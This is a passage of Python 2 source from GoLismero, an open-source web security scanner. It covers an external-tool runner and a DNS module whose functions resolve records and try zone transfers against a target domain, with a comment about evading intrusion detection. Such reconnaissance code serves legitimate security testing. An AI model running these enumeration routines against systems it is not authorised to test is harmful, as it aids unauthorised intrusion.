once for each line of text printed by the external tool. The trailing
newline character of each line is removed.
:type callback: callable
:returns: Return code from the external tool.
:rtype: int
:raises ExternalToolError: An error occurred when running an external tool.
"""
# We put a large and nasty security warning here mostly to scare the noobs,
# because subprocess is generally safe when you don't run in "shell" mode
# nor invoke bash directly - i.e. when you know what the hell you're doing.
#
# Still, especially on Windows, some external programs are really stupid
# when it comes to parsing their own command line, so caveat emptor.
# Validate the callback argument.
if callback is not None and not callable(callback):
raise TypeError("Expected function, got %r instead" % type(callback))
# An empty string in 'cwd' breaks Popen, so we need to convert it to None.
if not cwd:
cwd = None
# Make a copy of the command line arguments.
if not args:
args = []
else:
args = list(args)
if not command:
command = args[0]
del args[0]
elif args and args[0] == command:
del args[0]
if not command:
raise ValueError("Bad arguments for run_external_tool()")
# Check if the command is executable.
if not is_executable(command):
# Check if the command is a script.
try:
interpreter = get_interpreter(command)
except IOError:
interpreter = None
if interpreter:
# Prepend the interpreter to the command line.
command = interpreter[0]
args = interpreter[1:] + args
# If it's not a script...
else:
# Find the target in the path.
binary_list = find_binary_in_path(command)
if not binary_list:
raise IOError("File not found: %r" % command)
# On Windows, prefer Cygwin binaries over native binaries.
# Otherwise, just pick the first one in the PATH.
if os.path.sep == "\\":
binary = get_cygwin_binary(binary_list)
if binary:
command = binary
else:
command = binary_list[0]
else:
command = binary_list[0]
# Prepend the binary to the command line.
args.insert(0, command)
# Turn off DOS path warnings for Cygwin.
if os.path.sep == "\\":
if env is None:
env = os.environ.copy()
else:
env = env.copy()
cygwin = env.get("CYGWIN", "")
if "nodosfilewarning" not in cygwin:
if cygwin:
cygwin += " "
cygwin += "nodosfilewarning"
env["CYGWIN"] = cygwin
# If the user doesn't want the output,
# just run the process and wait for completion.
if callback is None:
return subprocess.check_call(args,
executable = command,
cwd = cwd,
env = env,
shell = False)
proc = None
try:
# Spawn the process.
try:
proc = subprocess.Popen(args,
executable = command,
cwd = cwd,
env = env,
stdout = subprocess.PIPE,
stderr = subprocess.STDOUT,
universal_newlines = True,
bufsize = 0,
shell = False,
)
# On error raise ExternalToolError.
except OSError, e:
msg = str(e)
if isinstance(e, WindowsError):
if "%1" in msg:
msg = msg.replace("%1", command)
raise ExternalToolError(msg, e.winerror)
raise ExternalToolError(msg, e.errno)
# Read each line of output and send it to the callback function.
while True:
line = proc.stdout.readline()
if not line:
break
if line.endswith("\n"):
line = line[:-1]
callback(line)
finally:
# Make sure the spawned process is dead.
if proc is not None and proc.poll() is None:
proc.terminate()
# Return the exit code.
return proc.returncode
#------------------------------------------------------------------------------
def is_executable(binary):
"""
Tests if the given file exists and is executable.
:param binary: Path to the binary.
:type binary: str
:returns: True if the file exists and is executable, False otherwise.
:rtype: bool
"""
return os.path.isfile(binary) and (
(os.path.sep == "\\" and binary.lower().endswith(".exe")) or
(os.path.sep == "/" and
os.stat(binary)[stat.ST_MODE] & stat.S_IXUSR != 0)
)
#------------------------------------------------------------------------------
# Default interpreter for each script file extension.
DEFAULT_INTERPRETER = {
".lua": ["lua"],
".php": ["php", "-f"],
".pl": ["perl"],
".rb": ["ruby"],
".sh": ["sh", "-c"],
".tcl": ["tcl"],
".py": ["python"],
".pyc": ["python"],
".pyo": ["python"],
".pyw": ["python"],
".js": ["WScript.exe"],
".jse": ["WScript.exe"],
".pls": ["WScript.exe"],
".phps": ["WScript.exe"],
".pys": ["WScript.exe"],
".rbs": ["WScript.exe"],
".tcls": ["WScript.exe"],
".vbs": ["WScript.exe"],
".vbe": ["WScript.exe"],
".wsf": ["WScript.exe"],
}
#------------------------------------------------------------------------------
def get_interpreter(script):
"""
Get the correct interpreter for the given script.
:param script: Path to the script file.
:type script: str
:returns: Command line arguments to replace the script with.
Normally this will be the path to the interpreter followed
by the path to the script, but not always.
:rtype: list(str)
:raises IOError: An error occurred, the file was not a script, or the
interpreter was not found.
"""
# Get the file extension.
ext = os.path.splitext(script)[1].lower()
# On Windows...
if os.path.sep == "\\":
# EXE files are executable.
if ext == ".exe":
binary_list = find_binary_in_path(script)
if binary_list:
cygwin = get_cygwin_binary(binary_list)
if cygwin:
return [ cygwin ]
return [ binary_list[0] ]
return [ script ]
# Batch files use cmd.exe.
if ext in (".bat", ".cmd"):
return [ os.environ["COMSPEC"], "/C", script ]
# On Unix, the script may be marked as executable.
elif is_executable(script):
return [ script ]
# Get the name of the default interpreter for each extension.
interpreter = DEFAULT_INTERPRETER.get(ext, None)
if interpreter:
interpreter = list(interpreter) # must be a copy!
# Add the .exe extension on Windows.
if os.path.sep == "\\" and not interpreter[0].endswith(".exe"):
interpreter[0] += ".exe"
# Look for the interpreter binary on the PATH.
binary_list = find_binary_in_path(interpreter[0])
if binary_list:
cygwin = get_cygwin_binary(binary_list)
if cygwin:
interpreter[0] = cygwin
else:
interpreter[0] = binary_list[0]
# Add the script and return it.
interpreter.append(script)
return interpreter
# Try getting the interpreter from the first line of code.
# This works for scripts that follow the shebang convention.
# See: https://en.wikipedia.org/wiki/Shebang_(Unix)
with open(script, "rb") as f:
signature = f.read(128)
signature = signature.strip()
if signature and signature[:1] == "#!":
signature = signature[1:].split("\n", 1)[0]
signature = signature.strip()
args = shlex.split(signature)
if args:
# If it exists and is executable, use it.
if is_executable(args[0]):
args.append(script)
return args
# Try to guess which interpreter it is.
for ext, interpreter in DEFAULT_INTERPRETER.iteritems():
regex = interpreter[0]
regex = "".join((c if c.isalnum() else "\\"+c) for c in regex)
regex = "\\b%s\\b" % regex
if re.search(regex, args[0]):
return interpreter + [script] # must be a copy!
# Broader search, matches stuff like python2, ruby1.9, etc.
for ext, interpreter in DEFAULT_INTERPRETER.iteritems():
regex = interpreter[0]
if regex.isalpha():
regex = "\\b%s[0-9\\.]*\\b" % regex
if re.search(regex, args[0]):
return interpreter + [script] # must be a copy!
# No valid interpreter was found.
raise IOError("Interpreter not found for script: %s" % script)
#------------------------------------------------------------------------------
def find_binary_in_path(binary):
"""
Find the given binary in the current environment PATH.
:note:
The location of the bundled tools is always prepended to the PATH,
independently of the actual value of the environment variable.
This means bundled tools will always be picked before system tools.
:param path: Path to the binary.
:type path: str
:returns: List of full paths to the binary.
If not found, the list will be empty.
:rtype: list(str)
"""
# Get the filename.
binary = os.path.split(binary)[1]
# Get the location of the external tools bundled with GoLismero.
tools_folder = get_tools_folder()
locations = [
os.path.join(tools_folder, x) for x in os.listdir(tools_folder)
]
# Get the possible locations from the PATH environment variable.
locations.extend(
os.path.abspath(x)
for x in os.environ.get("PATH", "").split(os.path.pathsep)
)
# Filter out bad entries.
locations = [ x for x in locations if os.path.isdir(x) ]
# On Windows...
if sys.platform in ("win32", "cygwin"):
# Append the system folders.
comspec = os.environ.get("ComSpec", "C:\\Windows\\System32\\cmd.exe")
comspec = os.path.split(comspec)[0]
system_root = os.environ.get("SystemRoot", "C:\\Windows")
system_32 = os.path.join(system_root, "System32")
system_64 = os.path.join(system_root, "SysWOW64")
if comspec not in locations: locations.append(comspec)
if system_root not in locations: locations.append(system_root)
if system_32 not in locations: locations.append(system_32)
if system_64 not in locations: locations.append(system_64)
# Look for the file in the PATH.
found = []
for candidate in locations:
if candidate:
candidate = os.path.join(candidate, binary)
if os.path.exists(candidate):
found.append(candidate)
# On Windows...
if sys.platform in ("win32", "cygwin"):
# Append the ".exe" extension to the binary if missing.
if os.path.splitext(binary)[1] == "":
binary += ".exe"
# Try again.
for candidate in locations:
if candidate:
candidate = os.path.join(candidate, binary)
if os.path.exists(candidate):
found.append(candidate)
# Remove duplicates caused by case differences.
upper = [x.upper() for x in found]
found = [x for i, x in enumerate(found) if x.upper() not in upper[:i]]
# On *nix...
else:
# Remove the extension to the binary if present.
if os.path.splitext(binary)[1] != "":
binary = os.path.splitext(binary)[0]
# Try again.
for candidate in locations:
if candidate:
candidate = os.path.join(candidate, binary)
if os.path.exists(candidate):
found.append(candidate)
# Return all instances found.
return found
#------------------------------------------------------------------------------
def is_cygwin_binary(path):
"""
Detects if the given binary is located in the Cygwin /bin directory.
:param path: Windows path to the binary.
:type path: str
:returns: True if the binary belongs to Cygwin, False for native binaries.
:rtype: bool
"""
path = os.path.abspath(path)
if not os.path.isdir(path):
path = os.path.split(path)[0]
path = os.path.join(path, "cygwin1.dll")
return os.path.exists(path)
#------------------------------------------------------------------------------
def get_cygwin_binary(binary_list):
"""
Take the list of binaries returned by find_binary_in_path() and grab the
one that belongs to Cygwin.
This is useful for commands or scripts that work different/better on Cygwin
than the native version (for example the "find" command).
:param binary_list: List of paths to the binaries to test.
:type binary_list: str(list)
:returns: Path to the Cygwin binary, or None if not found.
:type: str | None
"""
for binary in binary_list:
if is_cygwin_binary(binary):
return binary
#------------------------------------------------------------------------------
def find_cygwin_binary_in_path(binary):
"""
Find the given binary in the current environment PATH,
but only if it's the Cygwin version.
This is useful for commands or scripts that work different/better on Cygwin
than the native version (for example the "find" command).
:param path: Path to the binary.
:type path: str
:returns: Path to the Cygwin binary, or None if not found.
:type: str | None
"""
return get_cygwin_binary( find_binary_in_path(binary) )
#------------------------------------------------------------------------------
def win_to_cygwin_path(path):
"""
Converts a Windows path to a Cygwin path.
:param path: Windows path to convert.
Must be an absolute path.
:type path: str
:returns: Cygwin path.
:rtype: str
:raises ValueError: Cannot convert the path.
"""
drive, path = ntpath.splitdrive(path)
if not drive:
raise ValueError("Not an absolute path!")
t = { "\\": "/", "/": "\\/" }
path = "".join( t.get(c, c) for c in path )
return "/cygdrive/%s%s" % (drive[0].lower(), path)
#------------------------------------------------------------------------------
def cygwin_to_win_path(path):
"""
Converts a Cygwin path to a Windows path.
Only paths starting with "/cygdrive/" can be converted.
:param path: Cygwin path to convert.
Must be an absolute path.
:type path: str
:returns: Windows path.
:rtype: str
:raises ValueError: Cannot convert the path.
"""
if not path.startswith("/cygdrive/"):
raise ValueError(
"Only paths starting with \"/cygdrive/\" can be converted.")
drive = path[10].upper()
path = path[11:]
i = 0
r = []
while i < len(path):
c = path[i]
if c == "\\":
r.append( path[i+1:i+2] )
i += 2
continue
if c == "/":
c = "\\"
r.append(c)
i += 1
path = "".join(r)
return "%s:%s" % (drive, path)
#------------------------------------------------------------------------------
@contextlib.contextmanager
def tempfile(*args, **kwargs):
"""
Context manager that creates a temporary file.
The file is deleted when leaving the context.
Example:
>>> with tempfile(prefix="tmp", suffix=".bat") as filename:
... with open(filename, "w") as fd:
... fd.write("@echo off\\necho Hello World!\\n")
... print run_external_tool("cmd.exe", ["/C", filename])
...
('Hello World!', 0)
The arguments are exactly the same used by the standard NamedTemporaryFile
class (from the tempfile module).
"""
# On Windows we can't open a temporary file twice (although it's
# actually Python who won't let us). Note that there is no exploitable
# race condition here, because on Windows you can only create
# filesystem links from an Administrator account.
if sys.platform in ("win32", "cygwin"):
kwargs["delete"] = False
output_file = NamedTemporaryFile(*args, **kwargs)
output = output_file.name
output_file.close()
yield output
os.unlink(output_file.name)
# On POSIX we can do things more elegantly.
# It also prevents a race condition vulnerability, although if you're
# running a Python script from root you kinda deserve to get pwned.
else:
with NamedTemporaryFile(suffix = ".xml") as output_file:
yield output_file.name
#------------------------------------------------------------------------------
@contextlib.contextmanager
def tempdir():
"""
Context manager that creates a temporary directory.
The directory is deleted when leaving the context.
Example:
>>> with tempdir() as directory:
... print run_external_tool("cmd.exe", ["dir", directory])
...
"""
output_dir = mkdtemp()
yield output_dir
if os.path.isdir(output_dir):
try:
rmtree(output_dir)
except Exception:
pass
```
#### File: api/net/dns.py
```python
from __future__ import absolute_import
__license__ = """
GoLismero 2.0 - The web knife - Copyright (C) 2011-2014
Golismero project site: http://golismero-project.com
Golismero project mail: <EMAIL>
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
"""
__all__ = ["DNS"]
from ..data.information.dns import * # noqa
from ..data import LocalDataCache
from ...common import Singleton
import dns.query
import dns.resolver
import dns.reversename
import socket
from dns.zone import *
from netaddr import IPAddress
from netaddr.core import AddrFormatError
#------------------------------------------------------------------------------
class _DNS(Singleton):
# Some code borrowed from the dnsrecon project:
# https://github.com/darkoperator/dnsrecon
REQUEST_TIMEOUT = 2.0 # In seconds
# Public list of free DNS servers.
#
# This list was taken from:
#
# http://pcsupport.about.com/od/tipstricks/a/free-public-dns-servers.htm
#
PUBLIC_NAMESERVERS = [
# Level 3 (http://www.level3.com/)
"192.168.3.11",
"172.16.17.32",
# Google
"8.8.8.8",
"8.8.4.4",
# Security (http://www.securly.com/)
"172.16.58.3",
"172.16.17.32",
# Comodo Secure DNS (http://www.comodo.com/secure-dns/)
"8.26.56.26",
"8.20.247.20",
# OpenDNS Home (http://www.opendns.com/)
"208.67.222.222",
"208.67.220.220",
# DNS Advantage (http://www.neustar.biz/enterprise/dns-services/free-recursive-dns)
"172.16.17.32",
"172.16.31.10",
# Norton ConnectSafe (https://dns.norton.com/dnsweb/faq.do)
"172.16.58.3",
"192.168.127.12",
# SafeDNS (https://www.safedns.com/features/)
"192.168.127.12",
"192.168.3.11",
# OpenNIC (http://www.opennicproject.org/)
"192.168.127.12",
"172.16.31.10",
# Public -Root (http://public-root.com/root-server-check/index.htm)
"192.168.3.11",
"172.16.58.3",
# SmartViper (http://www.markosweb.com/free-dns/)
"192.168.127.12",
"172.16.17.32",
# Dyn (http://dyn.com/support/internet-guide-setup/)
"192.168.3.11",
"172.16.17.32",
# Hurricane Electric (http://he.net/)
"192.168.127.12",
# puntCAT (http://www.servidordenoms.cat/)
"172.16.58.3",
]
#--------------------------------------------------------------------------
def check_tcp_dns(self, address, dns_port=53):
"""
Function to check if a server is listening at port 53 TCP. This
will aid in IDS/IPS detection since a AXFR will not be tried if
TCP port 53 is found to be closed.
:param address: IP address or domain name.
:type address: str
:param dns_port: Port number to connect to the server.
:type dns_port: int
:return: True if server accepts TCP connections, False otherwise.
:rtype: bool
"""
if not isinstance(address, basestring):
raise TypeError("Expected basestring, got '%s'" % type(address))
if not isinstance(dns_port, int):
raise TypeError("Expected int, got '%s'" % type(dns_port))
if dns_port < 1:
raise ValueError("Port number must be greater than 0.")
s = socket.socket()
s.settimeout(self.REQUEST_TIMEOUT)
try:
s.connect((address, dns_port))
except Exception:
return False
else:
return True
finally:
s.close()
#--------------------------------------------------------------------------
def resolve(self, target, type, nameservers=None):
"""
Function for performing general resolution types.
Special type of register is "ALL", that returns all of the registers
returned by the query.
:param target: Name to resolve.
:type target: str
:param type: Type of query: ALL, A, AAAA, NS, PTR...
:type type: int | str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: DNS registers.
:rtype: list(DnsRegister)
"""
return self._make_request(type, target, nameservers)
#--------------------------------------------------------------------------
def get_a(self, host, nameservers=None, also_CNAME=False):
"""
Resolve the A records for a given host.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:param also_CNAME: Set this var to True if you want to return also the CNAME Registers returned by the query.
:tyep algo_CNAME: bool
:return: Type A registers.
:rtype: list(DnsRegisterA)
"""
# Special case for localhost
if host.lower() == "localhost":
return [DnsRegisterA("127.0.0.1")]
r = self._make_request("A", host, nameservers, auto_resolve=not also_CNAME)
# Get all the register: CNAME and A
if also_CNAME:
m_return = []
if not isinstance(r, list):
m_return.extend(self._dnslib2register("ALL", r))
else:
m_return_extend = m_return.extend
for lr in r:
m_return_extend(self._dnslib2register("ALL", lr))
return m_return
else:
return r
#--------------------------------------------------------------------------
def get_aaaa(self, host, nameservers=None, also_CNAME=False):
"""
Resolve the A Record for a given host.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:param also_CNAME: Set this var to True if you want to return also the CNAME Registers returned by the query.
:tyep algo_CNAME: bool
:return: AAAA registers.
:rtype: list(DnsRegisterAAAA)
"""
# Special case for localhost
if host.lower() == "localhost":
return [DnsRegisterAAAA("::1")]
r = self._make_request("AAAA", host, nameservers, auto_resolve=not also_CNAME)
if also_CNAME:
# Get all the register: CNAME and A
m_return = []
if not isinstance(r, list):
m_return.extend(self._dnslib2register("ALL", r))
else:
m_return_extend = m_return.extend
for lr in r:
m_return_extend(self._dnslib2register("ALL", lr))
return m_return
else:
return r
#--------------------------------------------------------------------------
def get_mx(self, host, nameservers=None):
"""
Resolve the MX records for a given host.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: MX registers.
:rtype: list(DnsRegisterMX)
"""
return self._make_request("MX", host, nameservers)
#--------------------------------------------------------------------------
def get_ns(self, host, nameservers=None):
"""
Returns all NS records. Also returns the IP
address of the host both in IPv4 and IPv6.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: NS registers.
:rtype: list(DnsRegisterNS)
"""
return self._make_request("NS", host, nameservers)
#--------------------------------------------------------------------------
def get_soa(self, host, nameservers=None):
"""
Returns all SOA records. Also returns the IP
address of the host both in IPv4 and IPv6.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: SOA registers.
:rtype: list(DnsRegisterSOA)
"""
return self._make_request("SOA", host, nameservers)
#--------------------------------------------------------------------------
def get_spf(self, host, nameservers=None):
"""
Resolve SPF records.
:param host: the target to make the request.
:type host: str
:param nameservers: nameserver to use.
:type nameservers: list(str)
:return: SPF registers.
:rtype: list(DnsRegisterSPF)
"""
return self._make_request("SPF", host, nameservers)
#--------------------------------------------------------------------------
def get_txt(self, host, nameservers=None):
"""
Resolve TXT records.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: TXT registers.
:rtype: list(DnsRegisterTXT)
"""
return self._make_request("TXT", host, nameservers)
#--------------------------------------------------------------------------
def get_ptr(self, ipaddress, nameservers=None):
"""
Resolve PTR records given it's IPv4 or IPv6 address.
:param ipaddress: Target IP address.
:type ipaddress: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: PTR registers.
:rtype: list(DnsRegisterPTR)
"""
if not isinstance(ipaddress, basestring):
raise TypeError("Expected basestring, got '%s'" % type(ipaddress))
# Detect the IP address version
m_ipobj = None
try:
m_ipobj = IPAddress(ipaddress)
except AddrFormatError:
raise ValueError("Wrong IP address")
# Make the query
m_ip = str(dns.reversename.from_address(ipaddress))
# Get the IPs
if m_ip:
if m_ipobj.version == "4":
m_name = m_ip.replace(".in-addr.arpa.", "")
else:
m_name = m_ip.replace("ip6.arpa.", "")
return self._make_request("PTR", m_name, nameservers)
else:
return []
#--------------------------------------------------------------------------
def get_srv(self, host, nameservers=None):
"""
Function for resolving SRV Records.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: SRV registers.
:rtype: list(DnsRegisterSRV)
"""
return self._make_request("SRV", host, nameservers)
#--------------------------------------------------------------------------
def get_nsec(self, host, nameservers=None):
"""
Function for querying for a NSEC record and retriving the rdata object.
This function is used mostly for performing a Zone Walk against a zone.
:param host: Target hostname.
:type host: str
:param nameservers: Nameservers to use.
:type nameservers: list(str)
:return: NSEC registers.
:rtype: list(DnsRegisterNSEC)
"""
return self._make_request("NSEC", host, nameservers)
#--------------------------------------------------------------------------
def zone_transfer(self, domain, nameservers = None, ns_allowed_zone_transfer=False):
"""
Function for testing for zone transfers on a given Domain.
:param domain: Target hostname.
:type domain: str
:param nameservers: Alternate nameservers.
:type nameservers: list(str)
:param ns_allowed_zone_transfer: is set to True, this funcion will return the list of
nameservers with zone transfer enabled.
:type ns_allowed_zone_transfer: bool
:return: If successful, a list of DnsRegister objects.
Otherwise, an empty list. If ns_allowed_zone_transfer is enabled, it will
return a tuple as format: (set(servers with zone transfer enabled), list(DnsRegister))
:rtype: list(DnsRegister) | (set(str), list(DnsRegister))
"""
if not isinstance(domain, basestring):
raise TypeError("Expected basestring, got '%s'" % type(domain))
if nameservers:
if isinstance(nameservers, list):
for n in nameservers:
if not isinstance(n, basestring):
raise TypeError("Expected basestring, got '%s'" % type(n))
else:
raise TypeError("Expected list, got '%s'" % type(nameservers))
# Results of zone transfer
zone_records = []
zone_records_append = zone_records.append
ns_zone_enabled = set()
# Availabe DNS servers
ns_records = None
# If nameservers specified -> use it
if nameservers:
ns_records = set(nameservers)
else: # Looking for nameservers for the domain
#Find NS for domains
ns_tmp = self.get_ns(domain)
#
# Check the input domain
#
# If name server of the domain is NOT empty -> the domain is NOT a nameserver
if ns_tmp:
# Mark for not tracking
map(LocalDataCache.on_autogeneration, ns_tmp)
# Store only the IP address of the DNS servers
l_dns = set()
l_dns_append = l_dns.add
for d in ns_tmp:
for t in self.get_ips(d):
l_dns_append(t.address)
# Mark for not tracking
LocalDataCache.on_autogeneration(t)
# Find SOA for Domain
for d in self.get_soa(domain):
for t in self.get_ips(d):
l_dns_append(t.address)
# Mark for not tracking
LocalDataCache.on_autogeneration(t)
# Mark for not tracking
LocalDataCache.on_autogeneration(d)
ns_records = l_dns
else:
# The domain is an DNS server
ns_records = set((domain,))
#
# Make the transfer for each NS Server
#
for ns_srv in ns_records:
if self.check_tcp_dns(ns_srv):
try:
zone = self._from_wire(dns.query.xfr(where=ns_srv, zone=domain, timeout=10))
# Store the ns used to the zone transfer
if ns_allowed_zone_transfer:
ns_zone_enabled.add(ns_srv)
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SOA):
for rdata in rdataset:
zone_records_append(self._dnslib2register("SOA",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NS):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NS",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.TXT):
for rdata in rdataset:
zone_records_append(self._dnslib2register("TXT",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SPF):
zone_records_append(self._dnslib2register("SPF",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.PTR):
for rdata in rdataset:
zone_records_append(self._dnslib2register("PTR",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.MX):
for rdata in rdataset:
zone_records_append(self._dnslib2register("MX",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.AAAA):
for rdata in rdataset:
zone_records_append(self._dnslib2register("AAAA",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.A):
for rdata in rdataset:
zone_records_append(self._dnslib2register("A",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.CNAME):
for rdata in rdataset:
zone_records_append(self._dnslib2register("CNAME",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SRV):
for rdata in rdataset:
zone_records_append(self._dnslib2register("SRV",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.HINFO):
for rdata in rdataset:
zone_records_append(self._dnslib2register("HINFO",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.WKS):
for rdata in rdataset:
zone_records_append(self._dnslib2register("WKS",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.RP):
for rdata in rdataset:
zone_records_append(self._dnslib2register("RP",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.AFSDB):
for rdata in rdataset:
zone_records_append(self._dnslib2register("AFSDB",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.LOC):
for rdata in rdataset:
zone_records_append(self._dnslib2register("LOC",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.X25):
for rdata in rdataset:
zone_records_append(self._dnslib2register("X25",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.ISDN):
for rdata in rdataset:
zone_records_append(self._dnslib2register("ISDN",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.RT):
for rdata in rdataset:
zone_records_append(self._dnslib2register("X25",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSAP):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSAP",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NAPTR):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NAPTR",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.CERT):
for rdata in rdataset:
zone_records_append(self._dnslib2register("CERT",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.SIG):
for rdata in rdataset:
zone_records_append(self._dnslib2register("SIG",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.RRSIG):
for rdata in rdataset:
zone_records_append(self._dnslib2register("RRSIG",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.DNSKEY):
for rdata in rdataset:
zone_records_append(self._dnslib2register("DNSKEY",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.DS):
for rdata in rdataset:
zone_records_append(self._dnslib2register("DS",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSEC):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSEC",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSEC3):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSEC3",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.NSEC3PARAM):
for rdata in rdataset:
zone_records_append(self._dnslib2register("NSEC3PARAM",rdata))
for (name, rdataset) in zone.iterate_rdatasets(dns.rdatatype.IPSECKEY):
for rdata in rdataset:
zone_records_append(self._dnslib2register("IPSECKEY",rdata))
except:
pass
if ns_allowed_zone_transfer:
return (ns_zone_enabled, zone_records)
else:
return zone_records
#--------------------------------------------------------------------------
#
# Helpers
#
#--------------------------------------------------------------------------
#
# This method has been taken directly (with some changes) from dns recon project
#
def _from_wire(self, xfr, zone_factory=Zone, relativize=True):
"""
Method for turning returned data from a DNS AXFR to RRSET.
This method will not perform a check origin on the zone data
as the method included with dnspython.
"""
z = None
for r in xfr:
if z is None:
if relativize:
origin = r.origin
else:
origin = r.answer[0].name
rdclass = r.answer[0].rdclass
z = zone_factory(origin, rdclass, relativize=relativize)
for rrset in r.answer:
znode = z.nodes.get(rrset.name)
if not znode:
znode = z.node_factory()
z.nodes[rrset.name] = znode
zrds = znode.find_rdataset(rrset.rdclass, rrset.rdtype,
rrset.covers, True)
zrds.update_ttl(rrset.ttl)
for rd in rrset:
rd.choose_relativity(z.origin, relativize)
zrds.add(rd)
return z
#--------------------------------------------------------------------------
def get_ips(self, register):
"""
Get the list of IPs associated the register as parameter.
If you pass CNAME register, you get an A/AAAA register:
>> cname = DnsRegisterCNAME("myalias.mysite.com")
>> a = Dns.get_ips(cname)
>> print a
[<DnsRegisterA object at 0x103ad9a50>]
>> print a[0]
<DnsRegisterA object at 0x103ad9a50>
>> print a[0].target
127.0.0.1
:param register: A DNS Register.
Valid registers are: DnsRegisterA, DnsRegisterAAAA,
DnsRegisterCNAME DnsRegisterISDN, DnsRegisterNS,
DnsRegisterNSAP, DnsRegisterPTR, DnsRegisterSOA,
DnsRegisterSRV, DnsRegisterWKS, DnsRegisterX25
:type register: DnsRegister
:return: A list with the A and AAAA registers.
:rtype : list(DnsRegisterA|DnsRegisterAAAA)
"""
if not isinstance(register, DnsRegister):
raise TypeError("Expected DnsRegister, got '%s'" % type(register))
PROP = self.PROPERTIES_WITH_IP_ADDRESSES
if register.type not in PROP:
return []
if register.type in ("A", "AAAA"):
return [register]
m_return = []
target = getattr(register, PROP[register.type])
# IPv4 address
m_return.extend(self.get_a(target))
# IPv6 address
m_return.extend(self.get_aaaa(target))
return m_return
PROPERTIES_WITH_IP_ADDRESSES = {
"A":"target",
"AAAA":"target",
"CNAME":"target",
"ISDN":"address",
"NS":"target",
"NSAP":"address",
"PTR":"target",
"SOA":"mname",
"SRV":"target",
"WKS":"address",
"X25":"address"
}
#--------------------------------------------------------------------------
def _dnslib2register(self, type, answer_in):
"""
Creates a DnsRegister from a dnslib register.
Special type of register "ALL" that converts all the types of the
registers.
:param type: Type of response to get: A, AAAA, CNAME...
:type type: str
:param answer_in: Object with the answer from dnslib.
:type answer_in: dns.resolver.Answer
:return: DNS register.
:rtype: list(DnsRegister)
"""
m_return = []
m_return_append = m_return.append
if isinstance(answer_in, dns.resolver.Answer):
for ardata in answer_in.response.answer:
for rdata in ardata:
register_type = DnsRegister.id2name(rdata.rdtype)
# If register it different that we are looking for, skip it.
if type != register_type and type != "ALL":
continue
m_return_append(self.__dnsregister2golismeroregister(register_type, rdata))
else:
register_type = DnsRegister.id2name(answer_in.rdtype)
m_return_append(self.__dnsregister2golismeroregister(register_type, answer_in))
return m_return
#--------------------------------------------------------------------------
def __dnsregister2golismeroregister(self, register_type, answer):
"""
Transform a dnslib register into a DnsRegister.
:param register_type: Type of register.
:type register_type: str
:param answer: dnslib object with a DNS register data.
:type answer: object
:return: DNS register.
:rtype: DnsRegister
"""
m_return = None
if register_type == "A":
m_return = DnsRegisterA(answer.address)
elif register_type == "AAAA":
m_return = DnsRegisterAAAA(answer.address)
elif register_type == "AFSDB":
m_return = DnsRegisterAFSDB(answer.subtype, answer.hostname.to_text()[:-1])
elif register_type == "CERT":
m_return = DnsRegisterCERT(answer.algorithm,
answer.certificate,
answer.certificate_type,
answer.key_tag)
elif register_type == "CNAME":
m_return = DnsRegisterCNAME(answer.target.to_text()[:-1])
elif register_type == "DNSKEY":
m_return = DnsRegisterDNSKEY(answer.algorithm,
answer.flags,
dns.rdata._hexify(answer.key),
